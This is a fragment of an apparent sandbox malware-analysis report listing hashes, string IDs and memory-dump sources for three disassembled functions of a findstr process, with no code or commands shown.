                                                • Instruction ID: f6a68b19c42bb2430c69520d49d578288f2362a10c431e147e856adc4ec9c604
                                                • Opcode Fuzzy Hash: 0996899eaeca102b32df2211a22bf3b45d6b3e1befb180f1c7519acc070dc0aa
                                                • Instruction Fuzzy Hash: EF41DF36700206AFD720DE25CD41FAAB7A5FF84750F180629F955AB380DB21E8528BE5
                                                Function 036C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction ID: b084cec2e2f8a13d48cecb8e274aba8d9a59b88013d42bf3c42a3732b328cf5d
                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction Fuzzy Hash: D991AE71E2029A9FDB24DE69C991ABEB7A5EF44320F18451EE875E73C0E7309941CF60
                                                Function 03689126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: 21bc14e5008a4628ec43148fca207e7002807f6c12931a7807176a155ee14393
                                                • Instruction ID: 273566e3ed7de0f195612d914144b98e12c92a16d9f34fb895906fde3c2f90b0
                                                • Opcode Fuzzy Hash: 21bc14e5008a4628ec43148fca207e7002807f6c12931a7807176a155ee14393
                                                • Instruction Fuzzy Hash: A0815A75D012699BDB31DF54CD54BEEBBB8AB08700F0446EAE919B7240D7309E85CFA4
                                                Function 03492B38 Relevance: 5.0, Strings: 4, Instructions: 28COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925100833.0000000003490000.00000040.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3490000_findstr.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "5$7}1<$_ ib$ib!Y
                                                • API String ID: 0-3399154490
                                                • Opcode ID: 4beeb8cc7fad709d1e000d35246fbba4deb8ccaf8f72f4edc2e34c1891231e9c
                                                • Instruction ID: a6cfe0b5281e716e8dd3d0973a1f354605575a31718540c9ce9878b860b22f4b
                                                • Opcode Fuzzy Hash: 4beeb8cc7fad709d1e000d35246fbba4deb8ccaf8f72f4edc2e34c1891231e9c
                                                • Instruction Fuzzy Hash: 28F0A030118B888ADB04BF10C00865ABBD1FB8930CF440A9EE8C9DA251DA78C241C74A